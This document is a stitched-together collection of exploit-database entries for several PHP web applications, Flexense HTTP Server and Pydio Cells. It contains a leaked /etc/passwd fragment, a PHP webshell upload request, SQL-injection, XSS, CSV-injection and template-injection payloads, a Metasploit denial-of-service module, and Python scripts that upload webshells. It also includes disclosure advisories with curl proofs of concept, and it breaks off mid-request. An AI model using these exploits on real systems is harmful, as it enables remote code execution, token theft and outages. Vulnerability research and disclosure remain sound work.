Content-Length: 1816 File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin fdfdsf)

Exploit Title: Rukovoditel 3.3.1 - CSV injection Version: 3.3.1 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 27-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account ) step 3. Set Firstname as =calc|a!z| step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/index.php?module=items/items&path=1) payload: =calc|a!z|

Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload Google Dork : NA Date: 19-01-2023 Exploit Author: AFFAN AHMED Vendor Homepage: https://github.com/unilogies/bumsys Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip Version: 1.0.3-beta Tested on: Windows 11, XAMPP-8.2.0 CVE : CVE-2023-0455 ================================ Steps_TO_Reproduce ================================ - Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/) - Click on action button to edit the Profile - Click on select logo button to upload the image - Intercept the POST Request and do the below changes . ================================================================ Burpsuite-Request ================================================================ POST /xhr/?module=settings&page=updateShop HTTP/1.1 Host: demo.bumsys.org Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7 Content-Length: 1280 Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99" X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4 Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA Accept: */* X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Platform: "Windows" Origin: https://demo.bumsys.org Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.bumsys.org/settings/shop-list/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopName" TEST ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopAddress" test ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopCity" testcity ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopState" teststate ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopPostalCode" 700056 ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopCountry" testIND ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopPhone" 895623122 ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopEmail" [email protected] ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopInvoiceFooter" ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php" Content-Type: image/png <?php echo system($_REQUEST['dx']); ?> ==================================================================================== Burpsuite-Response ==================================================================================== HTTP/1.1 200 OK Date: Thu, 19 Jan 2023 07:14:26 GMT Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips X-Powered-By: PHP/7.0.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65 <div class='alert alert-success'>Shop successfully updated.</div> ==================================================================================== VIDEO-POC : https://youtu.be/nwxIoSlyllQ

## Exploit Title: SCRMS 2023-05-27 1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 05.27.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `email` parameter appears to be vulnerable to SQL injection attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or 5206=5213-- were each submitted in the email parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker can easily steal all users and their passwords for access to the system. Even if they are strongly encrypted this will get some time, but this is not a problem for an attacker to decrypt if, if they are not enough strongly encrypted. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: email (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html) ## Time spend: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

## # Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit) # Date: 2018-03-09 # Exploit Author: Ege Balci # Vendor Homepage: https://www.flexense.com/downloads.html # Version: <= 10.6.24 # CVE : CVE-2018-8065 # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Flexense HTTP Server Denial Of Service', 'Description' => %q{ This module triggers a Denial of Service vulnerability in the Flexense HTTP server. Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values. Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable. }, 'Author' => [ 'Ege Balci <[email protected]>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2018-8065'], [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ], ], 'DisclosureDate' => '2018-03-09')) register_options( [ Opt::RPORT(80), OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]), OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ]) ]) end def check begin connect sock.put("GET / HTTP/1.0\r\n\r\n") res = sock.get if res and res.include? 'Flexense HTTP Server v10.6.24' Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end rescue Rex::ConnectionRefused print_error("Target refused the connection") Exploit::CheckCode::Unknown rescue print_error("Target did not respond to HTTP request") Exploit::CheckCode::Unknown end end def run unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end size = datastore['PacketSize'].to_i print_status("Starting with packets of #{size}-byte strings") count = 0 loop do payload = "" payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n" payload << "Host: 127.0.0.1\r\n" payload << "Accept: "+('A' * size)+"\r\n" payload << "\r\n\r\n" begin connect sock.put(payload) disconnect count += 1 break if count==datastore['PacketCount'] rescue ::Rex::InvalidDestination print_error('Invalid destination! Continuing...') rescue ::Rex::ConnectionTimeout print_error('Connection timeout! Continuing...') rescue ::Errno::ECONNRESET print_error('Connection reset! Continuing...') rescue ::Rex::ConnectionRefused print_good("DoS successful after #{count} packets with #{size}-byte headers") return true end end print_error("DoS failed after #{count} packets of #{size}-byte strings") end end

#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS #Google Dork : NA #Date: 23-01-2023 #Exploit Author : AFFAN AHMED #Vendor Homepage: https://phpgurukul.com #Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip #Version: 1.0 #Tested on: Windows 11 + XAMPP + PYTHON-3.X #CVE : CVE-2023-0527 #NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT # Below code check for both the parameter /admin-profile.php and in /search.php #POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md import requests import re from colorama import Fore print(Fore.YELLOW + "######################################################################" + Fore.RESET) print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET) print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET) print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET) print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET) print(Fore.YELLOW +"######################################################################" + Fore.RESET) print() print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET) print() # NAVIGATING TO ADMIN LOGIN PAGE Website_url = "http://localhost/osghs/admin/login.php" # CHANGE THE URL ACCORDING TO YOUR SETUP print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET) print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET) Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''} headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Referer': 'http://localhost/osghs/admin/login.php', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Connection': 'close', 'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'document' } response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials) if response.status_code == 200: location = re.findall(r'document.location =\'(.*?)\'',response.text) if location: print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET) print(Fore.GREEN + "> Popup:"+ Fore.RESET,location ) else: print(Fore.GREEN + "> document.location not found"+ Fore.RESET) else: print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET) print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET) # NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE # INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER Website_url= "http://localhost/osghs/admin/admin-profile.php" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE # FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD # FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search="" payload = { "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE "username": "admin", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE "mobilenumber": "8979555558", "email": "[email protected]", "submit": "", } # SENDING THE RESPONSE WITH POST REQUEST response = requests.post(Website_url, headers=headers, data=payload) print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) # CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX if response.status_code == 200: scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text) print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET) print(Fore.GREEN+">"+Fore.RESET,scripts)

# Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload # Date: 5/29/2023 # Author: Alex Gan # Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip # Version: 1.0 # Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6 # CVE: CVE-2023-33440 # References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440 # https://www.exploit-db.com/exploits/49320 # https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system # #!/usr/bin/env python3 import os import sys import requests import argparse from bs4 import BeautifulSoup from urllib.parse import urlparse from requests.exceptions import ConnectionError, Timeout def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', type=str, help='URL') parser.add_argument('-p', '--payload', type=str, help='PHP webshell') return parser.parse_args() def get_user_input(args): if not (args.url): args.url = input('Use the -u argument or Enter URL:') if not (args.payload): args.payload = input('Use the -p argument or Enter file path PHP webshell: ') return args.url, args.payload def check_input_url(url): parsed_url = urlparse(url) if not parsed_url.scheme: url = 'http://' + url if parsed_url.path.endswith('/'): url = url.rstrip('/') return url def check_host_availability(url): try: response = requests.head(url=url + '/login.php') if response.status_code == 200: print("[+] Host is accessible") else: print("[-] Host is not accessible") print(" Status code:", response.status_code) sys.exit() except (ConnectionError, Timeout) as e: print("[-] Host is not accessible") sys.exit() except requests.exceptions.RequestException as e: print("[-] Error:", e) sys.exit() def make_request(url, method, files=None): if method == 'GET': response = requests.get(url) elif method == 'POST': response = requests.post(url, files=files) else: raise ValueError(f'Invalid HTTP method: {method}') if response.status_code == 200: print('[+] Request successful') return response.text else: print(f'[-] Error {response.status_code}: {response.text}') return None def find_file(response_get, filename, find_url): soup = BeautifulSoup(response_get, 'html.parser') links = soup.find_all('a') found_files = [] for link in links: file_upl = link.get('href') if file_upl.endswith(filename): found_files.append(file_upl) if found_files: print(' File found:') for file in found_files: print('[*] ' + file) print(' Full URL of your file:') for file_url in found_files: print('[*] ' + find_url + file_url) else: print('[-] File not found') def main(): args = get_args() url, payload = get_user_input(args) url = check_input_url(url) check_host_availability(url) post_url = url + "/ajax.php?action=save_user" get_url = url + "/assets/uploads/" filename = os.path.basename(payload) payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))] print(" Loading payload file") make_request(post_url, 'POST', files=payload_file) print(" Listing the uploads directory") response_get = make_request(get_url, 'GET') print(" Finding the downloaded payload file") find_file(response_get, filename, get_url) if __name__ == "__main__": main()

Exploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Privilege Escalation Security Risk: high Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003 Advisory Status: published CVE: CVE-2023-32749 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ Users can share cells or folders with other users on the same Pydio instance. The web application allows to either select an already existing user from a list or to create a new user by entering a new username and password, if this functionality is enabled. When creating a new user in this way, a HTTP PUT request like the following is sent: ------------------------------------------------------------------------ PUT /a/user/newuser HTTP/2 Host: example.com User-Agent: agent Authorization: Bearer O48gvjD[...] Content-Type: application/json Content-Length: 628 Cookie: token=AO[...] { "Attributes": { "profile": "shared", "parameter:core.conf:lang": "\"en-us\"", "send_email": "false" }, "Roles": [], "Login": "newuser", "Password": "secret!", "GroupPath": "/", "Policies": [...] } ------------------------------------------------------------------------ The JSON object sent in the body contains the username and password for the user to be created and an empty list for the key "Roles". The response contains a JSON object similar to the following: ------------------------------------------------------------------------ { "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce", "GroupPath": "/", "Attributes": { "parameter:core.conf:lang": "\"en-us\"", "profile": "shared" }, "Roles": [ { "Uuid": "EXTERNAL_USERS", "Label": "External Users", "Policies": [...] }, { "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce", "Label": "User newuser", "UserRole": true, "Policies": [...] } ], "Login": "newuser", "Policies": [....], "PoliciesContextEditable": true } ------------------------------------------------------------------------ The key "Roles" now contains a list with two objects, which seem to be applied by default. The roles list in the HTTP request can be modified to contain a list of all available UUIDs for roles, which can be obtained by using the user search functionality. This results in a new user account with all roles applied. By performing a login as the newly created user, access to all cells and non-personal workspaces of the whole Pydio instance is granted. Proof of Concept ================ Login to the Pydio Cells web interface with a regular user and retrieve the JWT from the HTTP requests. This can either be done using an HTTP attack proxy or using the browser's developer tools. Subsequently, curl [1] can be used as follows to retrieve a list of all users and their roles: ------------------------------------------------------------------------ $ export JWT="<insert JWT here>" $ curl --silent \ --header "Authorization: Bearer $TOKEN" \ --header 'Content-Type: application/json' \ --data '{}' \ https://example.com/a/user | tee all_users.json {"Users":[...]} ------------------------------------------------------------------------ Afterwards, jq [2] can be used to create a JSON document which can be sent to the Pydio REST-API in order to create the external user "foobar" with the password "hunter2" and all roles assigned: ------------------------------------------------------------------------ $ jq '.Users[].Roles' all_users.json \ | jq -s 'flatten | .[].Uuid | {Uuid: .}' \ | jq -s 'unique' \ | jq '{"Login": "foobar", "Password": "hunter2", "Attributes": {"profile": "shared"}, "Roles": .}' \ | tee create_user.json { "Login": "foobar", "Password": "hunter2", "Attributes": { "profile": "shared" }, "Roles": [...] } ------------------------------------------------------------------------ Finally, the following curl command can be issued to create the new external user: ------------------------------------------------------------------------ $ curl --request PUT \ --silent \ --header "Authorization: Bearer $JWT" \ --header 'Content-Type: application/json' \ --data @create_user.json \ https://example.com/a/user/foobar ------------------------------------------------------------------------ Now, login with the newly created user to access all cells and non-personal workspaces. Workaround ========== Disallow the creation of external users in the authentication settings. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= Attackers with access to any regular user account for a Pydio Cells instance can extend their privileges by creating a new external user with all roles assigned. Subsequently, they can access all folders and files in any cell and workspace, except for personal workspaces. The creation of external users is activated by default. Therefore, the vulnerability is estimated to pose a high risk. Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== [1] https://curl.se/ [2] https://stedolan.github.io/jq/ RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/

Exploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004 Advisory Status: published CVE: CVE-2023-32751 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ When a file named "xss.html" is downloaded in the Pydio Cells web application, a download URL similar to the following is generated: https://example.com/io/xss/xss.html ?AWSAccessKeyId=gateway &Expires=1682495748 &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D &response-content-disposition=attachment%3B%20filename%3Dxss.html &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] The URL is akin to a presigned URL as used by the Amazon S3 service. It contains the URL parameter "response-content-disposition" which is set to "attachment" causing the response to contain a "Content-Disposition" header with that value. Therefore, the browser downloads the file instead of interpreting it. The URL also contains a signature and expiry timestamp, which are checked by the backend. Unlike a presigned URL as used by S3, the URL also contains the parameter "pydio_jwt" with the JWT of the user for authentication. Furthermore, the access key with the ID "gateway" is referenced, which can be found in the JavaScript sources of Pydio Cells together with the secret: ------------------------------------------------------------------------ _awsSdk.default.config.update({ accessKeyId: 'gateway', secretAccessKey: 'gatewaysecret', s3ForcePathStyle: !0, httpOptions: { timeout: PydioApi.getMultipartUploadTimeout() } }); ------------------------------------------------------------------------ With this information it is possible to change the URL parameter "response-content-disposition" to the value "inline" and then calculate a valid signature for the resulting URL. Furthermore, the content type of the response can be changed to "text/html" by also adding the URL parameter "response-content-type" with that value. This would result in a URL like the following for the previously shown example URL: https://example.com/io/xss/xss.html? AWSAccessKeyId=gateway &Expires=1682495668 &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D &response-content-disposition=inline &response-content-type=text%2Fhtml &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] Upon opening the URL in a browser, the HTML included in the file is interpreted and any JavaScript code is run. Proof of Concept ================ Upload a HTML file into an arbitrary location of a Pydio Cells instance. For example with the following contents: ------------------------------------------------------------------------ <html> <body> <h1>Cross-Site Scriping</h1> <script> let token = JSON.parse(localStorage.token4).AccessToken; alert(token); </script> </body> </html> ------------------------------------------------------------------------ The contained JavaScript code reads the JWT access token for Pydio Cells from the browser's local storage object and opens a message box. Instead of just displaying the JWT, it could also be sent to an attacker. The following JavaScript function can then be run within the browser's developer console to generate a presigned URL for the HTML file: ------------------------------------------------------------------------ async function getPresignedURL(path) { let client = PydioApi.getClient(); let node = new AjxpNode(path); let metadata = {Bucket: "io", ResponseContentDisposition: "inline", Key: path, ResponseContentType: "text/html"}; let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata); return url; } await getPresignedURL("xss/xss.html"); ------------------------------------------------------------------------ The code has to be run in context of Pydio Cells while being logged in. If the resulting URL is opened in a browser, the JavaScript code contained in the HTML file is run. If the attack is conducted in the described way, the JWT of the attacker is exposed through the URL. However, this can be circumvented by first generating a public URL for the file and then constructing the presigned URL based on the resulting download URL. Workaround ========== No workaround known. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= Attackers that can upload files to a Pydio Cells instance can construct URLs that execute arbitrary JavaScript code in context of Pydio Cells upon opening. This could for example be used to steal the authentication tokens of users opening the URL. It is likely that such an attack succeeds, since sharing URLs to files hosted using Pydio Cells is a common use case of the application. Therefore, the vulnerability is estimated to pose a high risk. Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== [1] https://aws.amazon.com/sdk-for-javascript/ RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

Exploit Title: Pydio Cells 4.1.2 - Server-Side Request Forgery Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Server-Side Request Forgery Security Risk: medium Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005 Advisory Status: published CVE: CVE-2023-32750 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ Using the REST-API of Pydio Cells it is possible to start jobs. For example, when renaming a file or folder an HTTP request similar to the following is sent: ------------------------------------------------------------------------ PUT /a/jobs/user/move HTTP/2 Host: example.com User-Agent: agent Accept: application/json Authorization: Bearer G4ZRN[...] Content-Type: application/json Content-Length: 140 { "JobName": "move", "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}" } ------------------------------------------------------------------------ The body contains a JSON object with a job name and additional parameters for the job. Besides the "move" job, also a job with the name "remote-download" exists. It takes two additional parameters: "urls" and "target". In the "urls" parameter, a list of URLs can be specified and in the parameter "target" a path can be specified in which to save the response. When the job is started, HTTP GET requests are sent from the Pydio Cells server to the specified URLs. The responses are saved into a file, which are uploaded to the specified folder within Pydio Cells. Potential errors are transmitted in a WebSocket channel, which can be opened through the "/ws/event" endpoint. Proof of Concept ================ Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then, run the following commands to start a "remote-download" job to trigger an HTTP request: ------------------------------------------------------------------------ $ export JWT="<insert JWT here>" $ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \ | jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \ | tee remote-download.json $ curl --header "Authorization: Bearer $JWT" \ --header 'Content-Type: application/json' \ --request PUT \ --data @remote-download.json 'https://example.com/a/jobs/user/remote-download' ------------------------------------------------------------------------ The URL in the JSON document specifies which URL to request. The "target" field in the same document specifies into which folder the response is saved. Afterwards, the response is contained in a file in the specified folder. Potential errors are communicated through the WebSocket channel. Workaround ========== Limit the services which can be reached by the Pydio Cells server, for example using an outbound firewall. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= The risk is highly dependent on the environment in which the attacked Pydio Cells instance runs. If there are any internal HTTP services which expose sensitive data on the same machine or within the same network, the server-side request forgery vulnerability could pose a significant risk. In other circumstances, the risk could be negligible. Therefore, overall the vulnerability is rated as a medium risk. Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/

# Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI) # Author: tmrswrr # Date: 31/05/2023 # Vendor: https://www.motocms.com # Link: https://www.motocms.com/website-templates/demo/189526.html # Vulnerable Version(s): MotoCMS 3.0.27 ## Description MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the keyword parameter. ## Steps to Reproduce 1. Open the target URL: https://template189526.motopreview.com/ 2. Write payload here : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}} 3. You will be see result is 49 Vuln Url : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}} GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1 Host: template189526.motopreview.com Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Dnt: 1 Referer: 